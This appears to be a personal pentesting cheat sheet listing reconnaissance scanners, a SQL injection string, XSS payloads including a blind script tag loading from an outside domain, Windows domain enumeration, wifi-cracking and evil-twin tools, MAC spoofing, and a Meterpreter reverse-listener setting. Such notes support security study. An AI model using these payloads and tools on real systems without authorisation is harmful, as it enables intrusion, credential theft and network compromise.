Skip to content

Hacking Basic Tools

KABA key set

https://www.fischer-faeh-kaba8.ch/produkt/schluessel-set-kaba-8-profi-9-schluessel/

Reconnaissance

nmap

Scan ports

nmap -sS -sV -v -O <ip>

-p- to scan all ports

Scanning with a vulnerability script:

sudo nmap -sV --script vulners <target>

telnet

To gather basic info, telnet on port 80, and type this:

HEAD / HTTP/1.0

Hit enter twice.

Nikto

Vulnerability scanner for websites

whatweb

Finds services running on website

wapiti

Vulnerability scanner for websites

droopescan

Vulnerability scanner for website https://github.com/droope/droopescan

pip3 install droopescan

moodlescan

Vulnerability scanner for the moodle webapp

https://github.com/inc0d3/moodlescan

Lynis

Vulnerability scanner for systems (local and remote)

wash

Scan for WPS enabled routers

Metsploit HTTP scans

https://www.offensive-security.com/metasploit-unleashed/scanner-http-auxiliary-modules/

msfconsole

Routersploit

Framework for router pentesting. Command is rsf.

gobuster

Scan webserver directories

gobuster dir -u http://<ip>:3333 -w <word list location> -l

-q to hide banner

Check for SQL injection

https://www.softwaretestinghelp.com/sql-injection-how-to-test-application-for-sql-injection-attacks/

' or 1=1;--

Use different quotes

" ' ´

XSS - Cross site scripting

Source: https://www.bugbountyhunter.com/vulnerability/?type=xss

Different types of XSS

  • Stored XSS is when the XSS is stored in the websites database and reflected back to users. For example imagine your twitter name. This is stored & displayed to other users.
  • Reflective XSS is when XSS is reflected in the source via a parameter in the URL/request, either via a GET or a POST request.
  • DOM XSS is XSS executing from the DOM, usually injected via hash fragments, for example #q=<svg/onload=alert(0)>
  • Self XSS is XSS that only affects you. This could be in your account settings that only you can access. For these types of XSS I recommend looking for CSRF login for chaining.
  • Blind XSS is an XSS payload that fires blindly, for example on an admins backend. Imagine you have ordered some food and you add on the notes, <script src=//zseano.com/> and when the restaurant opens your order, the XSS payload may fire.

Start with something small, like a <h2> in your input. <script will most likely be filtered.

Windows CMD commands

See all user accounts on the domain

net user /domain

See all groups on the domain

net group /domain

See all members of a group

net group <groupname> /domain

Attacking

Hiding text

with a carriage return (\r), you can overwrite text.

responder

Get online drive password hashes

fluxion

Get 4-way handshake & evil twin attack

wifite

wireless auditor which uses different tactics to get into a wifi network

reaver & bully

Tools to get a wifi password by cracking the WPS Pin. Reaver seems to be unreliable with some ralink chips.

Metsploit WebDAV exploitation

https://resources.infosecinstitute.com/topic/learning-pentesting-metasploitable3-exploiting-webdav/
https://charlesreid1.com/wiki/Metasploitable/Apache/DAV

Detection

rkhunter

Rootkit detection

ClamAV

Malware detection

Full system scan:

sudo clamscan --recursive --infected --exclude-dir='^/sys|^/dev' /

Maintaining access

Maintaining access - tutorialspoint

Other

Change MAC address

Take Down Network Interface

You'll want to take your network device offline to change your mac address:

ifconfig eth0 down

or if you're using wireless,

ifconfig wlan2 down

Change Your Mac

Change it to something random:

macchanger -r eth0

Bring Up Your Network Interface

Time to bring your network device back online:

ifconfig eth0 up

Check To Make Sure

ifconfig

Metasploit exploit over NAT

If we don’t really want the Meterpreter handler to fall back to 0.0.0.0, we can use one of the "advanced" options and tell it to listen on the LAN IP address:

msf exploit(ms13_069_caret) > set ReverseListenerBindAddress 192.168.0.187
ReverseListenerBindAddress => 192.168.0.187